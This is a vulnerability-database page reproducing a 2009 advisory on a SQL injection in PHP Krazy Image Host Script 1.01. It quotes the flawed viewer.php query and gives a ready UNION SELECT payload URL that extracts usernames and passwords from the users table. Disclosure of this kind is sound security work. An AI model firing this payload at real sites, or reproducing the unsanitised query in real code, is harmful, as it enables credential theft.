Lucene search
K

PHP Krazy Image Host Script 1.01 SQL Injection

🗓️ 12 Feb 2009 00:00:00Reported by X0rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

PHP Krazy Image Host Script 1.01 SQL Injection Vulnerability in viewer.ph

Code
`#########################################################################################  
[0x01] Informations:  
  
Name : PHP Krazy Image Host Script 1.01  
Download : http://www.hotscripts.com/listings/jump/download/66961/  
Vulnerability : Sql Injection  
Author : x0r  
Contact : [email protected]  
Notes : Proud to be Italian  
#########################################################################################  
[0x02] Bug:  
  
Bugged file is /[path]/viewer.php  
  
[Code]  
$id = $_GET['id']; [...]  
$query="SELECT * FROM images WHERE id=" . $id;  
$result = mysql_query($query);  
[/code]  
  
#########################################################################################  
[0x03] Exploit:  
  
Exploit: http://victim.it/viewer.php?id=-1 union select  
0,0,0,concat(id,char(45),user,char(45),password),0,0, from users--  
  
########################################################################################  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Feb 2009 00:00Current
0.3Low risk
Vulners AI Score0.3
21